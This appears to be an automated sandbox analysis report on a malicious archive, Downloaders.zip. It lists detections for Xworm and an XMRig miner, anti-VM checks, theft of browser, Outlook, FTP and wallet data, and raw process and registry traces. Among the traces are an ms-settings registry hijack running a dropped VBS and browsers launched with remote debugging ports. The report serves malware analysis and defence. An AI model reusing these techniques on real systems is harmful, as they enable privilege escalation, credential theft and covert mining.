Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
xmrig
Xmrig family
Xworm family
Xworm
Detect Xworm Payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Blocklisted process makes network request
Uses browser remote debugging
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Reads user/profile data of web browsers
Identifies Wine through registry keys
Drops startup file
Checks BIOS information in registry
Unsecured Credentials: Credentials In Files
Reads data files stored by FTP clients
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates processes with tasklist
UPX packed file
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Unsigned PE
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
outlook_win_path
outlook_office_path
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-27 20:13
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-27 20:13
Reported
2024-11-27 20:29
Platform
win11-20241007-uk
Max time kernel
597s
Max time network
601s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2560 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe | C:\Windows\Explorer.EXE |
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\unik.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\unik.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\unik.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs | C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\unik.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\unik.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\unik.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e59ca0d\TikTok18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\7901.vbs" | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe"
C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
"C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
"C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe"
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5252 -ip 5252
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5628 -ip 5628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 92
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 92
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\unik.exe
"C:\Users\Admin\AppData\Local\Temp\a\unik.exe"
C:\Users\Admin\AppData\Local\Temp\a\xblkpfZ8Y4.exe
"C:\Users\Admin\AppData\Local\Temp\a\xblkpfZ8Y4.exe"
C:\Users\Admin\AppData\Local\Temp\a\test28.exe
"C:\Users\Admin\AppData\Local\Temp\a\test28.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc077fcc40,0x7ffc077fcc4c,0x7ffc077fcc58
C:\Users\Admin\AppData\Local\Temp\a\test26.exe
"C:\Users\Admin\AppData\Local\Temp\a\test26.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1820 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2052,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2320 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2084,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2344 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\test27.exe
"C:\Users\Admin\AppData\Local\Temp\a\test27.exe"
C:\Users\Admin\AppData\Local\Temp\a\test29.exe
"C:\Users\Admin\AppData\Local\Temp\a\test29.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3032,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3052 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3060,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\a\test25.exe
"C:\Users\Admin\AppData\Local\Temp\a\test25.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4132,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4168 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4228,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4172 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\test24.exe
"C:\Users\Admin\AppData\Local\Temp\a\test24.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe
"C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbf6373cb8,0x7ffbf6373cc8,0x7ffbf6373cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2676 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --lang=uk --service-sandbox-type=utility --mojo-platform-channel-handle=3196 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3244 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4376 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --disable-gpu-compositing --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1976,6409532153052944459,17310769617541426798,131072 --disable-gpu-compositing --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
